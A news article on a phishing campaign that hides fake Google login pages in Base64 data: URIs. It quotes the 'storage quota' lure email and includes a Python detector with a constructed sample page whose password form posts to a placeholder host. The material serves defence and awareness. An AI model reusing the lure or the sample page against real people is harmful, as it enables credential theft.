Hackers are stealing Google account passwords using a new phishing attack that is hard to catch with traditional heuristic detection, warns security firm Bitdefender.
The attack exploits the uniform resource identifiers (URIs) that Google Chrome uses to display data. This makes Chrome users most vulnerable, but the attack also targets Mozilla Firefox users.
“With access to users’ Google accounts, hackers can buy apps on Google Play, hijack Google+ accounts and access confidential Google Drive documents,” said Catalin Cosoi, chief security strategist at Bitdefender.
“The scam starts with an email allegedly sent by Google, with ‘Mail Notice’ or ‘New Lockout Notice’ as the subject,” he said.
The message reads: “This is a reminder that your email account will be locked out in 24 hours, due to not being able to increase your email storage quota.
“Go to the INSTANT INCREASE to increase your Email storage automatically.”
The link then redirects victims to a fake Google login web page that asks for their credentials.
“What is interesting about this phishing attack is that users end up having the ‘data:’ in their browser’s address bar, which indicates the use of a data URI scheme,” said Cosoi.
The data URI scheme, he said, allows scammers to include data in-line in web pages, as if they were external resources.
The scheme uses Base64 encoding to represent file contents, in this case supplying the content of the fake web page in an encoded string in the data URI.
As Google Chrome does not show the whole string, Cosoi said regular users may not realise they are being targeted in a phishing attack and give their data to cyber criminals.
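A defender-side check for the technique described above, added here as an example (not code from Bitdefender or from the article): it scans a mail body or proxy log line for data: URIs, decodes the Base64 (or percent-encoded) payload, and flags any inline HTML page that carries a password field or a form posting elsewhere. The sample lure and the collector.invalid host are constructed for the example.

```python
import base64
import re
from urllib.parse import unquote
# data: URI as found in a mail body or proxy log: media type, parameters, payload.
DATA_URI_RE = re.compile(
    r"data:(?P<mime>[\w.+-]+/[\w.+-]+)?(?P<params>(?:;[\w.+-]+=?[\w.+-]*)*)"
    r",(?P<payload>[A-Za-z0-9+/=%._~!$&'()*-]+)",
    re.IGNORECASE,
)
# Signs that a decoded inline page collects credentials.
CREDENTIAL_MARKERS = (
    re.compile(r"<input[^>]+type\s*=\s*['\"]?password", re.I),
    re.compile(r"<form[^>]+action\s*=\s*['\"]?https?://", re.I),
)

def decode_data_uri(uri: str) -> tuple[str, bytes]:
    """Return (media type, decoded bytes); ValueError if not a data: URI."""
    m = DATA_URI_RE.match(uri)
    if not m:
        raise ValueError("not a data: URI")
    mime = (m.group("mime") or "text/plain").lower()
    payload = m.group("payload")
    if ";base64" in m.group("params").lower():
        payload += "=" * (-len(payload) % 4)  # tolerate stripped padding
        return mime, base64.b64decode(payload)
    return mime, unquote(payload).encode("utf-8", "replace")

def find_data_uri_phish(text: str) -> list[dict]:
    """One finding per data: URI whose inline HTML carries a credential form."""
    findings = []
    for m in DATA_URI_RE.finditer(text):
        try:
            mime, body = decode_data_uri(m.group(0))
        except ValueError:  # covers binascii.Error on bad base64
            continue
        if not mime.startswith("text/html"):
            continue
        html = body.decode("utf-8", "replace")
        hits = [p.pattern for p in CREDENTIAL_MARKERS if p.search(html)]
        if hits:
            findings.append({"mime": mime, "size": len(body), "indicators": hits})
    return findings

# Constructed sample: the "storage quota" lure linking to an inline base64 page
# that posts credentials to a placeholder host (collector.invalid).
FAKE_PAGE = (b"<html><body><form action='http://collector.invalid/login' method='post'>"
             b"<input name='Email'><input type='password' name='Passwd'>"
             b"<input type='submit' value='Sign in'></form></body></html>")
SAMPLE_MAIL = ("Your email account will be locked out in 24 hours. Go to the INSTANT "
               "INCREASE: data:text/html;base64," + base64.b64encode(FAKE_PAGE).decode())
```

Because the whole page travels inside the link, the decoded body (not the visible address bar) is what a mail gateway or proxy should inspect.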
Disguised phishing on the rise
Google, Facebook, eBay, phone services and financial institutions are among phishers’ favourite disguises to invade inboxes worldwide, he said.
Phishing attacks are likely to increase due to the use of automation and the ability to bypass host-based detection systems, according to Johannes Ullrich, dean of research for the SANS Technology Institute.
However, this does not mean that businesses are powerless against such attacks. There are several ways businesses can reduce the risk of successful phishing attacks.
These range from security education aimed at making users more aware of phishing techniques, to implementing effective methods and procedures such as continuous network monitoring.